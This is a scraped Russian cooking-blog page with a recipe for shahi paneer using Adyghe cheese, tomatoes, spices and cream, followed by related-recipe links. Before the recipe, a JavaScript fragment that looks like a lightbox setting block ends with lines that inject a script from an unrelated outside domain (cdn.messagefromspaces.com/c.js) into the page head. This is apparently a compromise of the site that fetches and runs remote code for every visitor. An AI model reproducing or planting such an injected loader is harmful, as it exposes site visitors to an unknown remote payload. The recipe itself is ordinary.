, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Шахи-панир


panirЭто блюдо для любителей индийской кухни. Ну еще можно устроить вечеринку и пригласить друзей на ужин с шахи-паниром. Наверняка придут! Думаю, нечасто следуют такие приглашения…

Что и сколько берем:

1. Cыр Адыгейский — 200 гр

2. Помидоры — 2 шт

3. Лук репчатый — 2шт

4. Чеснок — 2-3 зубчика

5. Гарам- масала — 1 ч.л

6. Кардамон — 1/2 ч.л

7. Имбирь — небольшой кусочек

8. Кетчуп Heinz — 3/4 ст.л

9. Сливки — 200/300 гр

10. Перец болгарский — 1 шт

Начинаем готовить:

Сначала все режем: лук полукольцами, перец и сыр квадратиками, помидоры чистим от шкурки и нарезаем кусочками. Выкладываем на разогретую сковородку лук и жарим его минуты 3-4. Добавляем рубленный чеснок и тертый мелко имбирь, а затем гарам-масалу и кардамон. Далее кладем  помидорчики, а когда они пустят сок, отправляем на сковородку болгарский перец. Теперь  настало время положить кетчуп и можно подлить немного воды, чтобы консистенция блюда была не очень густой. Через минутку вливаем сливки и на последок не забываем положить адыгейский сыр. Накрываем крышкой, даем потомиться минуты 2-3. Выключаем и ждем минут 15, чтобы все пропиталось и настоялось.  Очень хорошо есть шахи-панир с рисом.

На эту тему вы можете почитать:

Баклажаны с острым соусом
Овощи по-индийски
Салат из цукини


Добавить комментарий